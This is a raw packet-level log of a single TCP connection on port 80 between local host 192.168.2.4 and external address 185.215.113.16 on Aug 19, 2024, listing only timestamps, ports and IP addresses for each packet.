Aug 19, 2024 06:04:04.148783922 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148798943 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148816109 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148819923 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148830891 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148845911 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148873091 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148919106 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148935080 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148950100 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148956060 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148964882 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.149014950 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.149014950 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.149049044 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.149070024 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.149085045 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.149097919 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.149108887 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.149108887 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.149123907 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.149144888 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209321976 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209381104 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209395885 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209410906 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209414005 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209435940 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209461927 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209464073 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209477901 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209491968 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209506989 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209512949 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209523916 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209537983 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209557056 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209557056 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209569931 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209583998 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209605932 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209609985 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209609985 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209630966 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209646940 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209656000 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209656000 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209667921 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209671021 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209686995 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209708929 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209708929 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209708929 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209728003 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209737062 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209737062 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209743023 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209757090 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209780931 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209785938 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209786892 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209798098 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209806919 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209821939 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209829092 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209836006 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209850073 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209860086 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209860086 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209866047 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209882975 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209896088 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209903002 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209903955 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209913969 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209913969 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209950924 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209971905 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.209975958 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.209985971 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210009098 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210025072 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210032940 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210032940 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210041046 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210057020 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210071087 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210073948 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210073948 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210087061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210098028 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210100889 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210098982 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210115910 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210149050 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210169077 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210175037 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210189104 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210203886 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210216045 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210254908 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210270882 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210274935 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210284948 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210304022 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210313082 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210356951 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210370064 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210370064 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210380077 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210393906 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210402012 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210407972 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210433960 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210443974 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210443974 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210455894 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210474014 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210480928 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210480928 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210489988 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210504055 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210506916 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210517883 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210551977 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210551977 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210717916 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210743904 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210757971 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210776091 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210776091 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210798025 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210808992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210824013 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210839987 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210854053 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210866928 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210866928 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210890055 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210928917 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.210977077 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.210992098 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211008072 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211021900 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211039066 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211051941 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211051941 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211052895 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211070061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211083889 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211097956 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211097956 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211163998 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211457968 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211478949 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211503983 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211508989 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211518049 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211532116 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211548090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211548090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211551905 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211568117 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211569071 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211581945 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211586952 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211621046 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211621046 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211630106 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211678028 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211728096 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211740971 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211764097 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211779118 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211788893 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211788893 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211791992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.211827993 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.211827993 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.302969933 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.302984953 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303011894 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303026915 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303030014 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303042889 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303057909 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303067923 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303081989 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303095102 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303097010 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303119898 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303136110 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303138018 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303138018 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303150892 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303173065 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303173065 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303215981 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303520918 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303534985 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303551912 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303570986 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303596973 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303596973 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303776026 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303855896 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303877115 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303900957 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303915977 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303930998 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303941011 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303941011 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303952932 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303967953 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303973913 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303973913 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303985119 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.303987980 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.303998947 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304025888 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304025888 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304084063 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304275036 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304291010 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304306984 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304322004 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304337025 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304337025 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304368973 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304368973 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304414034 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304430008 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304445982 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304459095 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304459095 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304491997 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304491997 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304505110 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304785013 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304811954 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304827929 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304847002 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304847002 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304852009 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304867983 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304873943 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304893970 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304912090 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304927111 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304935932 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.304943085 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.304956913 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305035114 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305566072 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305592060 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305602074 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305668116 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305682898 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305697918 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305722952 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305737972 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305738926 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305738926 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305752039 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305768013 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305777073 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305793047 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305807114 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305811882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305811882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305823088 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305838108 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305851936 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305851936 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305876970 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305879116 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305879116 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305891037 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305906057 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.305933952 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305933952 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.305965900 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306025982 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306044102 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306060076 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306075096 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306087017 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306102991 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306185961 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306597948 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306612968 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306628942 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306642056 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306652069 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306652069 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306657076 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306672096 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306688070 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306698084 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306718111 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306720972 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306735992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306750059 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306762934 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306762934 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306763887 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306792021 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306830883 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306855917 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306869030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306878090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306878090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306888103 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306915045 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306932926 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306938887 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306955099 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306972027 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306978941 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306978941 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.306988001 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.306993008 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.307003021 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.307023048 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.307023048 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.307059050 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.307073116 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.307087898 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.307102919 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.307121038 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.307126999 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.307126999 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.307137012 CEST	80	49737	185.215.113.16	192.168.2.4
